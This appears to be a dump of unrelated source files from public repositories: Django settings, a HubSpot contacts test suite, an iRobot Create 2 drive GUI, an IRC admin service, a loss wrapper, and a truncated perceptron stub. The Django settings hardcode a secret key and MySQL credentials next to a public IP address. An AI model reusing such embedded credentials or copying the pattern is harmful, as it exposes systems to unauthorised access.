|
[
"MIT"
] |
permissive
|
geumilbae/covid19
|
4c138868b06565003ed0b07e45b693c19eabbe85
|
84b29aff9500ee84586172ced75974ba90a25def
|
refs/heads/master
| 2022-11-07T23:42:15.886638
| 2020-06-23T03:02:26
| 2020-06-23T03:02:26
| 274,110,353
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,057
|
py
|
"""
Django settings for covid19 project.
Generated by 'django-admin startproject' using Django 3.0.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
import sys
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'drdo)(lbc3*aa=7112zc%#byds@j@)c#c#_qy4_a8!ib)$#pg@'
# SECURITY WARNING: don't run with debug turned on in production!
if 'DJANGO_DEBUG_FALSE' in os.environ:
DEBUG = False
SECRET_KEY = os.environ['DJANGO_SECRET_KEY']
ALLOWED_HOSTS = [os.environ['SITENAME']]
else:
DEBUG = True
SECRET_KEY = 'insecure-key-for-dev'
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'rest_framework',
'allauth',
'drf_yasg',
'path',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'covid19.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'covid19.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
if sys.platform == 'linux':
host = 'localhost'
elif sys.platform == 'darwin':
host = '192.168.219.108'
else:
host = '116.39.106.25'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'covid19_db',
'USER': 'remote_bot_covid19',
'PASSWORD': 'Bot_2020',
'HOST': host,
'PORT': '3306',
'OPTIONS': {
'init_command': "SET sql_mode='STRICT_TRANS_TABLES'",
'charset': 'utf8mb4',
'use_unicode': True,
},
'TEST': {
'NAME': 'test_covid19_db',
'CHARSET': 'utf8mb4',
'COLLATION': 'utf8mb4_general_ci',
}
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
STATICFILES_DIR = {
os.path.join(BASE_DIR, 'static')
}
|
[
"geumil.bae@projectybl.com"
] |
geumil.bae@projectybl.com
|
4730516c37bcf18d3631c49bfe2d9c3476a0f8ec
|
a96f623c237985fd77927f55c9b3335e536117a6
|
/hapi/test/test_contacts.py
|
1ff4ad3b5f82101d23633ba53909ddea2b554764
|
[
"Apache-2.0"
] |
permissive
|
jpetr/hapipy
|
47793955175118cc9427681d5dd3b369527da0a3
|
07db3bb7280654a6021ab3e95aad3cdca2c5cedc
|
refs/heads/master
| 2020-12-25T05:26:49.270540
| 2012-06-12T22:32:49
| 2012-06-12T22:32:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,466
|
py
|
import unittest2
import helper
import simplejson as json
from nose.plugins.attrib import attr
from hapi.contacts import ContactsClient  # assumed module path for the client exercised below
class ContactsClientTest(unittest2.TestCase):
""" Unit tests for the HubSpot Clients API Python client.
This file contains some unittest tests for the Clients API.
It is not intended to be exhaustive, just simple exercises and
illustrations.
All these methods work in similar ways. First, make a variable with
required input. Pass it into the method being tested. Check if that
method returned something. Display results. Clean up.
Additional tests and other improvements welcome.
TODO: these tests have not been run before, so they may not pass
Questions, comments, etc: http://developers.hubspot.com
"""
def setUp(self):
self.client = ContactsClient(**helper.get_options())
def tearDown(self):
pass
@attr('api')
def test_get_contact(self):
# make a contact to mess with
dummy_contact = json.dumps(dict(
email = 'blaghblagh@blagh.com',
firstname = 'Robert',
lastname = 'Paulson',
website = 'www.wxyz.com',
company = 'Paper Street Soap Company',
phone = '1369121518',
city = 'Anytown',
state = 'The moon',
zip = 'space'
))
created_contacts = self.client.create_contact(dummy_contact)
# this is the contact's id the test will look for
test_id = created_contacts['vid']
# try and get it
contacts_recieved = self.client.get_contact(test_id)
# make sure you got at least one contact
self.assertTrue(contacts_recieved['vid'])
print "Got these contacts by their id: %s" % json.dumps(contacts_recieved)
@attr('api')
def test_get_contact_by_email(self):
# create a contact to get
dummy_contact = json.dumps(dict(
email = 'yetAnother@fakeEmail.com',
firstname = 'Imaginary',
lastname = 'Friend',
website = 'nonexistant.com',
company = 'Unproductive Corp',
phone = '1231231231',
address = '25 Danger road',
city = 'Stormwind',
state = 'Azeroth',
zip = '71200'
))
returned_contact = self.client.create_contact(dummy_contact)
# make sure it was actually made
self.assertTrue(returned_contact['vid'])
# this is the contact's email the test will be looking for
test_email = returned_contact['email']
# try and get it
contacts_recieved = self.client.get_by_email(test_email)
# see if you got something
self.assertTrue(contacts_recieved['vid'])
print "Got these contacts by their email: %s" % json.dumps(contacts_recieved)
# if it found it, clean up
self.client.delete_contact(contacts_recieved['vid'])
@attr('api')
def test_create_contact(self):
# this will be the information of the contact being made. It is JSON, as required according to the API
dummy_contact = json.dumps(dict(
email = 'silly@thisisntreal.com',
firstname = 'Silly',
lastname = 'Testman',
website = 'thisisntreal.com',
company = 'Fake Industries',
phone = '1234567890',
address = '123 fake street',
city = 'Springfield',
state = 'Ohiyamaude',
zip = '12345'
))
# try and make it
created_contact = self.client.create_contact(dummy_contact)
# see if you made it
self.assertTrue(created_contact['vid'],
"Was not able to create a contact: %s" % json.dumps(dummy_contact))
print "Created a contact: %s" % json.dumps(created_contact)
# if it was made, clean up
self.client.archive_contact(created_contact['vid'])
@attr('api')
def test_update_contact(self):
# make a contact to update
fake_info = json.dumps(dict(
email = 'old.email@thisisntreal.com',
firstname = 'Dumb',
lastname = 'Testman',
website = 'foobar.com',
company = 'Acme Inc',
phone = '1357111317',
address = '5678 Whatever street',
city = 'Pretendville',
state = 'Imaginationland',
zip = '31337'
))
created_contact = self.client.create_contact(fake_info)
# the contact's id number the test will try to update
contact_id_to_update = created_contact['vid']
# the information being updated in the contact
new_fake_info = json.dumps(dict(
email = 'new.email@thisisntreal.com',
firstname = 'Stupid',
lastname = 'Testguy',
website = 'thisisfake.org',
company = 'Pretend Incorporated',
phone = '0987654321',
address = '321 Sesame Street',
city = 'Atlantis',
state = 'Atlantic Ocean',
zip = '11235'
))
# try and update
update_response = self.client.update_contact(contact_id_to_update, new_fake_info)  # method name assumed to match the other contact calls
# make sure it worked
if update_response >= 400:
self.fail("Unable to update contact")
else:
print "Succesfully updated a contact"
# if it worked, clean up
self.client.archive_contact(contact_id_to_update)
@attr('api')
def test_archive_contact(self):
# make a contact to archive
fake_info = json.dumps(dict(
email = 'person@emailserver.com',
firstname = 'Scumbag',
lastname = 'Steve',
website = 'examplewebsite.edu',
company = 'Spatula City',
phone = '900014255',
address = '1600 Pensylvania ave',
city = 'Washington D.C.',
state = 'Not really sure',
zip = '43110'
))
created_contact = self.client.create_contact(fake_info)
# make sure it was actually created
self.assertTrue(created_contact['vid'])
# the id number of the contact being deleted
id_to_archive = created_contact['vid']
# try and archive
self.client.archive_contact(id_to_archive)  # assumed: same archive call used in the other tests, applied to the id defined above
# look for the archived id
found_contacts = self.client.get_contact(id_to_archive)
# it should not have been returned
if len(found_contacts['contacts']) == 0:
print "The contact with id: %s was archived" % id_to_archive
else:
self.fail("Was not able to archive contact %s" % id_to_archive)
@attr('api')
def test_get_statistics(self):
# retrieve the statistics
returned_stats = self.client.get_statistics()
# make sure you got something
self.assertTrue(len(returned_stats))
print "Got stats: %s" % json.dumps(returned_stats)
@attr('api')
def test_search(self):
# make a contact to search for
fake_info = json.dumps(dict(
email = 'notreal@examplecontact.com',
firstname = 'Troll',
lastname = 'Face',
website = 'www.blaghblaghblagh.com',
company = 'Initech',
phone = '1098765432',
address = '52 Last Avenue',
city = 'Leftraod',
state = 'Energy',
zip = '56473'
))
created_contact = self.client.create_contact(fake_info)
# make sure it was actually made
self.assertTrue(created_contact['vid'])
# what the test is searching for
search_this = 'Troll'
# do the search
returned_contacts = self.client.search(search_this)
# the search should return at least one contact
if len(returned_contacts['contacts']) == 0:
print "Didn't find anything by searching: %s" % search_this
else:
print "Found these contacts: %s" % json.dumps(returned_contacts)
if __name__ == "__main__":
unittest2.main()
|
[
"jpetr@hubspot.com"
] |
jpetr@hubspot.com
|
6a36669b8243e90144c2521c0c1d74ad42ac2682
|
0d2a02e4badf0c4f24060a709ac9a5f5fbf86796
|
/RobotDoge/Debug/Create2_TetheredDrive.py
|
dcca016820b36d93a738a13383a0dfa96b9772ef
|
[] |
no_license
|
tjwilder/Ice-Cream-Puppy
|
8923d7b07cdacd6d480d59852d2b8c76fffe8ee9
|
ede11679d296f5166defb06611400b7820230598
|
refs/heads/master
| 2021-05-29T19:57:14.940663
| 2015-10-25T15:58:41
| 2015-10-25T15:58:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,943
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 27 May 2015
###########################################################################
# Copyright (c) 2015 iRobot Corporation
# http://www.irobot.com/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# Neither the name of iRobot Corporation nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
###########################################################################
from Tkinter import *
import tkMessageBox
import tkSimpleDialog
import struct
import sys, glob # for listing serial ports
import win32pipe
import win32file
try:
import serial
except ImportError:
tkMessageBox.showerror('Import error', 'Please install pyserial.')
raise
connection = None
TEXTWIDTH = 40 # window width, in characters
TEXTHEIGHT = 16 # window height, in lines
VELOCITYCHANGE = 200
ROTATIONCHANGE = 300
helpText = """\
Supported Keys:
P\tPassive
S\tSafe
F\tFull
C\tClean
D\tDock
R\tReset
Space\tBeep
Arrows\tMotion
If nothing happens after you connect, try pressing 'P' and then 'S' to get into safe mode.
"""
class TetheredDriveApp(Tk):
# static variables for keyboard callback -- I know, this is icky
callbackKeyUp = False
callbackKeyDown = False
callbackKeyLeft = False
callbackKeyRight = False
callbackKeyLastDriveCommand = ''
def __init__(self):
Tk.__init__(self)
self.title("iRobot Create 2 Tethered Drive")
self.option_add('*tearOff', FALSE)
self.menubar = Menu()
self.configure(menu=self.menubar)
createMenu = Menu(self.menubar, tearoff=False)
self.menubar.add_cascade(label="Create", menu=createMenu)
createMenu.add_command(label="Connect", command=self.onConnect)
createMenu.add_command(label="Help", command=self.onHelp)
createMenu.add_command(label="Quit", command=self.onQuit)
self.text = Text(self, height = TEXTHEIGHT, width = TEXTWIDTH, wrap = WORD)
self.scroll = Scrollbar(self, command=self.text.yview)
self.text.configure(yscrollcommand=self.scroll.set)
self.text.pack(side=LEFT, fill=BOTH, expand=True)
self.scroll.pack(side=RIGHT, fill=Y)
self.text.insert(END, helpText)
self.bind("<Key>", self.callbackKey)
self.bind("<KeyRelease>", self.callbackKey)
# sendCommandASCII takes a string of whitespace-separated, ASCII-encoded base 10 values to send
def sendCommandASCII(self, command):
cmd = ""
for v in command.split():
cmd += chr(int(v))
self.sendCommandRaw(cmd)
# sendCommandRaw takes a string interpreted as a byte array
def sendCommandRaw(self, command):
global connection
try:
if connection is not None:
connection.write(command)
else:
tkMessageBox.showerror('Not connected!', 'Not connected to a robot!')
print "Not connected."
except serial.SerialException:
print "Lost connection"
tkMessageBox.showinfo('Uh-oh', "Lost connection to the robot!")
connection = None
print ' '.join([ str(ord(c)) for c in command ])
self.text.insert(END, ' '.join([ str(ord(c)) for c in command ]))
self.text.insert(END, '\n')
self.text.see(END)
# getDecodedBytes returns a n-byte value decoded using a format string.
# Whether it blocks is based on how the connection was set up.
def getDecodedBytes(self, n, fmt):
global connection
try:
return struct.unpack(fmt, connection.read(n))[0]
except serial.SerialException:
print "Lost connection"
tkMessageBox.showinfo('Uh-oh', "Lost connection to the robot!")
connection = None
return None
except struct.error:
print "Got unexpected data from serial port."
return None
# get8Unsigned returns an 8-bit unsigned value.
def get8Unsigned(self):
return getDecodedBytes(1, "B")
# get8Signed returns an 8-bit signed value.
def get8Signed(self):
return getDecodedBytes(1, "b")
# get16Unsigned returns a 16-bit unsigned value.
def get16Unsigned(self):
return getDecodedBytes(2, ">H")
# get16Signed returns a 16-bit signed value.
def get16Signed(self):
return getDecodedBytes(2, ">h")
# A handler for keyboard events. Feel free to add more!
def callbackKey(self, event):
k = event.keysym.upper()
motionChange = False
if event.type == '2': # KeyPress; need to figure out how to get constant
if k == 'P': # Passive
self.sendCommandASCII('128')
elif k == 'S': # Safe
self.sendCommandASCII('131')
elif k == 'F': # Full
self.sendCommandASCII('132')
elif k == 'C': # Clean
self.sendCommandASCII('135')
elif k == 'D': # Dock
self.sendCommandASCII('143')
elif k == 'SPACE': # Beep
self.sendCommandASCII('140 3 1 64 16 141 3')
elif k == 'R': # Reset
self.sendCommandASCII('7')
elif k == 'UP':
self.callbackKeyUp = True
motionChange = True
elif k == 'DOWN':
self.callbackKeyDown = True
motionChange = True
elif k == 'LEFT':
self.callbackKeyLeft = True
motionChange = True
elif k == 'RIGHT':
self.callbackKeyRight = True
motionChange = True
else:
print repr(k), "not handled"
elif event.type == '3': # KeyRelease; need to figure out how to get constant
if k == 'UP':
self.callbackKeyUp = False
motionChange = True
elif k == 'DOWN':
self.callbackKeyDown = False
motionChange = True
elif k == 'LEFT':
self.callbackKeyLeft = False
motionChange = True
elif k == 'RIGHT':
self.callbackKeyRight = False
motionChange = True
if motionChange == True:
velocity = 0
velocity += VELOCITYCHANGE if self.callbackKeyUp is True else 0
velocity -= VELOCITYCHANGE if self.callbackKeyDown is True else 0
rotation = 0
rotation += ROTATIONCHANGE if self.callbackKeyLeft is True else 0
rotation -= ROTATIONCHANGE if self.callbackKeyRight is True else 0
# compute left and right wheel velocities
vr = velocity + (rotation/2)
vl = velocity - (rotation/2)
# create drive command
cmd = struct.pack(">Bhh", 145, vr, vl)
if cmd != self.callbackKeyLastDriveCommand:
self.sendCommandRaw(cmd)
self.callbackKeyLastDriveCommand = cmd
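# Note: 145 is the Create 2 Open Interface "Drive Direct" opcode; the two signed
# 16-bit values packed by struct.pack(">Bhh", ...) are the right and left wheel
# velocities in mm/s (roughly -500..500 per the OI spec).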
def onConnect(self):
global connection
if connection is not None:
tkMessageBox.showinfo('Oops', "You're already connected!")
return
try:
ports = self.getSerialPorts()
port = tkSimpleDialog.askstring('Port?', 'Enter COM port to open.\nAvailable options:\n' + '\n'.join(ports))
except EnvironmentError:
port = tkSimpleDialog.askstring('Port?', 'Enter COM port to open.')
if port is not None:
print "Trying " + str(port) + "... "
try:
connection = serial.Serial(port, baudrate=115200, timeout=1)
print "Connected!"
tkMessageBox.showinfo('Connected', "Connection succeeded!")
except:
print "Failed."
tkMessageBox.showinfo('Failed', "Sorry, couldn't connect to " + str(port))
def onHelp(self):
tkMessageBox.showinfo('Help', helpText)
def onQuit(self):
if tkMessageBox.askyesno('Really?', 'Are you sure you want to quit?'):
self.destroy()
def getSerialPorts(self):
"""Lists serial ports
From http://stackoverflow.com/questions/12090503/listing-available-com-ports-with-python
:raises EnvironmentError:
On unsupported or unknown platforms
:returns:
A list of available serial ports
"""
if sys.platform.startswith('win'):
ports = ['COM' + str(i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this is to exclude your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
def setupServer():
fileHandle = win32file.CreateFile("c:\\temp\\puppy_pipe",
win32file.GENERIC_READ | win32file.GENERIC_WRITE,
0, None,
win32file.OPEN_EXISTING,
0, None)
data = win32file.ReadFile(fileHandle, 4096)
print data
if __name__ == "__main__":
setupServer()
app = TetheredDriveApp()
app.mainloop()
|
[
"tk100794@gmail.com"
] |
tk100794@gmail.com
|
cca0aa41f8a28e2f2a0634efb775b39109545a5d
|
7b579a4b0a4f0841650f18cfdec502dcd7b0b83c
|
/ircd/adminserv.py
|
cf2bf8657c43d98b241e1cfafe4c6ad17cf5df05
|
[] |
no_license
|
SpoonRocket/nameless-ircd
|
7d72d9970da1aa0aa1ff3ee5c3cf022b4dc3741e
|
d4c7877145103bdccf52e8297a9e130720486fab
|
refs/heads/master
| 2020-12-24T15:40:13.599225
| 2013-07-30T21:51:24
| 2013-07-30T21:51:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,299
|
py
|
from asynchat import async_chat
from asyncore import dispatcher
import os, socket, time
from nameless import services, util
locking_dict = util.locking_dict
class adminserv(services.Service):
def __init__(self,server,config={}):
services.Service.__init__(self,server,config=config)
self.nick = self.__class__.__name__
self.cmds = locking_dict({
'die':self.die,
'debug':self.toggle_debug,
'denerf':self.denerf_user,
'nerf':self.nerf_user,
'nerf_all':self.nerf_all,
'denerf_all':self.denerf_all,
'ping':self.set_ping,
'global':self.send_global,
'count':self.count,
'list':self.list,
'kill':self.kline,
'help':self.send_help,
'limit':self.limit,
'flood':self.set_flood_kill,
'?':self.send_help,
'link':self.link_server,
'delink':self.unlink_server,
'quiet':self.quiet_user,
'unquiet':self.unquiet_user,
'check':self.toggle_force_check
})
def handle_line(self,line):
class dummy:
def __init__(self):
self.nick = util.get_admin_hash_list()[0]
def privmsg(self,*args,**kwds):
pass
self.privmsg(dummy(),line)
@services.admin
def serve(self,server,user,line,resp_hook):
services.Service.serve(self,server,user,line,resp_hook)
def link_server(self,user,args,resp_hook):
"""
link to another server
link local $port
link i2p $i2pdest
link onion $onion
"""
if len(args) == 2:
type = args[0]
addr = args[1]
if type == 'local':
try:
addr = int(addr)
except:
resp_hook('local link requires port number only')
return
self.server.link.local_link(addr)
elif type == 'i2p':
self.server.link.i2p_link(addr)
elif type == 'onion':
self.server.link.tor_link(addr)
else:
resp_hook('bad link type: '+type)
else:
resp_hook('usage: link link_type link_address')
def unlink_server(self,user,args,resp_hook):
self.server.link.disconnect_all()
resp_hook('delinked all servers')
def toggle_force_check(self,user,args,resp_hook):
"""
toggle dropping of old s2s protocol
"""
self.server.force_check = not self.server.force_check
resp_hook('drop old = %s'%self.server.force_check)
def die(self,user,args,resp_hook):
"""
turn sever off
"""
reason = 'going offline'
if len(args) > 0:
reason = ' '.join(args)
self.server.stop(reason)
def limit(self,user,args,resp_hook):
"""
rate limit actions, meant to replace ``flood''
topic
topic setting ratelimiting
nick
nickname changing
privmsg#
private messages to # channels
privmsg&
private messages to & channels
join
channel joining
"""
resp = [ str(k) + ' : ' + str(v) for k,v in self.server.limits.items() ]
if len(args) > 0:
attr = args[0]
val = None
if len(args) > 1:
try:
val = int(args[1])
if val <= 0:
raise Exception()
except:
resp_hook('invalid value: '+args[1])
return
if attr in self.server.limits:
if val is not None:
self.server.limits[attr] = val
resp = [attr + ' : ' + str(val)]
for line in resp:
resp_hook(line)
def send_help(self,user,args,resp_hook):
"""
show help message
"""
resp_hook('commands:')
for cmd, func in self.cmds.items():
resp_hook(cmd)
h = func.__doc__ or 'No Help'
for line in h.split('\n'):
resp_hook('-- '+line)
resp_hook(' ')
def toggle_debug(self,user,args,resp_hook):
"""
toggle server debug mode
"""
self.server.toggle_debug()
resp_hook('DEBUG: %s' % self.server.debug())
def quiet_user(self,user,args,resp_hook):
"""
set quiet
"""
for u in args:
if u in self.server.users:
u = self.server.users[u]
u.quiet = True
def unquiet_user(self,user,args,resp_hook):
"""
unset quiet
"""
for u in args:
if u in self.server.users:
u = self.server.users[u]
u.quiet = False
def nerf_user(self,user,args,resp_hook):
"""
set mode +P on one or more users
"""
for u in args:
if u in self.server.users:
u = self.server.users[u]
u.set_mode('+P')
u.lock_modes()
resp_hook('set mode +P on '+u.nick)
def denerf_user(self,user,args,resp_hook):
"""
unset mode +P on one or more users
"""
for u in args:
if u in self.server.users:
u = self.server.users[u]
u.unlock_modes()
u.set_mode('-P')
resp_hook('set mode -P on '+u.nick)
def nerf_all(self,user,args,resp_hook):
"""
set +P on every user
"""
self.server.send_global('Global +P Usermode Set')
for u in self.server.handlers:
u.set_mode('+P')
u.lock_modes()
resp_hook('GLOBAL +P')
def denerf_all(self,user,args,resp_hook):
"""
unset -P on every user
"""
self.server.send_global('Global -P Usermode Set')
for u in self.server.handlers:
u.unlock_modes()
u.set_mode('-P')
resp_hook('GLOBAL -P')
def set_ping(self,user,args,resp_hook):
"""
set ping timeout
"""
server = self.server
if len(args) == 1:
try:
old = server.pingtimeout
server.pingtimeout = int(args[0])
if server.pingtimeout < 10:
server.pingtimeout = 10
except:
resp_hook('not a number')
resp_hook('PING: '+str(server.pingtimeout)+' seconds')
def set_flood_kill(self,user,args,resp_hook):
"""
set flood settings
kill
toggle kill on flood
interval [float]
flood interval in seconds
bpi [integer]
bytes per interval
lpi [integer]
lines per interval
"""
resp = [
'kill: '+str(self.server.flood_kill),
'interval: '+str(self.server.flood_interval) ,
'bpi: '+str(self.server.flood_bpi),
'lpi: '+str(self.server.flood_lpi)
]
if len(args) > 0:
attr = args[0]
val = None
if len(args) > 1:
try:
val = float(args[1])
if val <= 0:
raise Exception()
except:
resp_hook('invalid value: '+args[1])
return
if attr == 'bpi':
if val is not None:
self.server.flood_bpi = val
resp = ['bpi: '+str(self.server.flood_bpi)]
elif attr == 'lpi':
if val is not None:
self.server.flood_lpi = val
resp = ['lpi: '+str(self.server.flood_lpi)]
elif attr == 'interval':
if val is not None:
self.server.flood_interval = val
resp = ['interval: '+str(self.server.flood_interval)]
elif attr == 'kill':
self.server.flood_kill = not self.server.flood_kill
resp = ['kill: '+str(self.server.flood_kill)]
for line in resp:
resp_hook(line)
def send_global(self,user,args,resp_hook):
"""
send global message to all users
"""
msg = ' '.join(args)
self.server.send_global(msg)
resp_hook('GLOBAL: %s'%msg)
def count(self,user,args,resp_hook):
"""
count server objects
users
count users
chans
count channels
"""
if len(args) > 0:
for targ in args:
i = []
targ = targ.lower()
if len(targ) == 0:
continue
elif targ == 'users':
i = self.server.users.values()
elif targ == 'chans':
i = self.server.chans.values()
resp_hook(str(len(i))+' '+targ+'s')
else:
resp_hook('Usage: COUNT [user|chan]')
# still useful for debugging
# undeprecated for now
# adding more functionality
#@services.deprecated
def list(self,user,args,resp_hook):
"""
list server objects
users
list users
chans
list channels
chan:&chan
chan:#chan
list users in channel
user:nickname
list channels user is in
links
list server links
"""
if len(args) > 0:
for targ in args:
i = []
targ = targ.lower()
if len(targ) == 0:
continue
elif targ == 'links':
i = self.server.link.links
elif targ == 'users':
i = self.server.users
elif targ == 'chans':
i = self.server.chans
elif targ.count(':') > 0:
ind = targ.index(':')
t2,t1 = targ[ind+1:], targ[:ind]
if t1 == 'chan':
# list users in channel as seen by server
i = t2 in self.server.chans and self.server.chans[t2].users or []
targ = t1 + ' has user'
elif t1 == 'user':
# list channels user is in as seen by server
i = t2 in self.server.users and self.server.users[t2].chans or []
targ = t1 + ' in channel'
for obj in i:
resp_hook(targ+': '+str(obj))
else:
resp_hook('Usage: LIST [user|chan]')
def kline(self,user,args,resp_hook):
"""
kill one or more user's connections
"""
for u in args:
if u not in self.server.users:
resp_hook('NO USER: '+str(u))
continue
u = self.server.users[u]
u.kill('kline')
resp_hook('KILLED '+str(u))
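# Hypothetical admin session (nicknames and values are illustrative):
#   /msg adminserv limit              -> list current rate limits
#   /msg adminserv limit join 5       -> set the channel-join limit to 5
#   /msg adminserv nerf somenick      -> set and lock usermode +P on somenick
#   /msg adminserv global maintenance in 5 minutes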
|
[
"ampernand@gmail.com"
] |
ampernand@gmail.com
|
dbfa4c587a9c4313aa29f64ec78cbe79f67f35f5
|
3c4c57a0feea3eb30ade51553153dd30d47581b0
|
/basics/classes/learning_class.py
|
46e946e1a660b82ef8dca71416df6b4b5c13616f
|
[] |
no_license
|
ShivSoni5/Python-Practice
|
e165824d829a791503eb3957f8e93cd3230d0b57
|
769b0f4898fcf8de52122045571aa31e678b4e9f
|
refs/heads/master
| 2021-10-14T16:05:46.474990
| 2019-02-05T04:48:03
| 2019-02-05T04:48:03
| 101,506,952
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 694
|
py
|
#!/usr/bin/python3
class about_me:
#__init__ is just like constructors in C++
def __init__(self,name,college,year):
self.name = name #these three are instances
self.college = college
self.year = year
def my_name(self):
print("Hello, my name is", self.name)
def clg_name(self):
print("I am in",self.college,"college")
def cur_year(self):
print("I read in",self.year,"year")
branch = "CSE" #this is class variable
A = about_me("Shiv Soni","JECRC","3rd")
"""
A.my_name()
A.clg_name()
A.cur_year()
"""
print(A.year)
print(A.college)
print(A.name)
print(A.branch)
print(about_me.branch) #class variable can be accessed using class name also
|
[
"shivsonic05@gmail.com"
] |
shivsonic05@gmail.com
|
07a04f5bbce51d5e87bb50681fe02389393bd786
|
df6606f995b3e81d5f95fdc0abdc8eec09893df5
|
/outlier_pooling/losses/cross_entropy_loss.py
|
adb0df7491d9edce852a5fff2155befad9c03153
|
[] |
no_license
|
wakamori-k/cren
|
321f16073c506423ba329bbc2121cfe0d5aadeae
|
1ccf1d0a36b0ecbce41f11875d9b4193fff4d3f4
|
refs/heads/master
| 2023-03-04T01:39:33.060006
| 2021-02-16T18:16:40
| 2021-02-16T18:16:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 442
|
py
|
from utils import seed_torch
import torch
seed_torch()
from .base_loss import BaseLoss
class CrossEntropyLoss(BaseLoss):
def __init__(self, **kwargs):
assert kwargs['train_type'] == 'classification', "Cross Entropy Loss can only be used for classification."
super().__init__()
self.criterion = torch.nn.CrossEntropyLoss()
def forward(self, outputs, labels):
return self.criterion(outputs, labels)
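# Usage sketch (assumes BaseLoss subclasses torch.nn.Module so the instance is
# callable): torch.nn.CrossEntropyLoss expects raw logits of shape
# [batch, num_classes] and integer class labels of shape [batch], e.g.
#   loss = CrossEntropyLoss(train_type='classification')
#   value = loss(torch.randn(8, 10), torch.randint(0, 10, (8,)))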
|
[
"noreply@github.com"
] |
wakamori-k.noreply@github.com
|
0d93d68b19810b8e89749bc128fd79b93304d5e0
|
bcca0627e186697f83065535d5fcaac3ede739c7
|
/mlp/MultiLayerPerceptron.py
|
c1c3341d38d18a5391fea53cf10de5ab9481c73e
|
[] |
no_license
|
owinogradow/soft-computing
|
60d088a1064b3dc74eb95657c970989ec4904541
|
c207d67efec7fb10b02fa94341972202700974e1
|
refs/heads/master
| 2022-12-26T01:15:15.199828
| 2020-10-02T12:27:50
| 2020-10-02T12:27:50
| 300,597,032
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,806
|
py
|
from InputNeuron import InputNeuron
from Neuron import Neuron
import random
import numpy as np
class MultiLayerPerceptron:
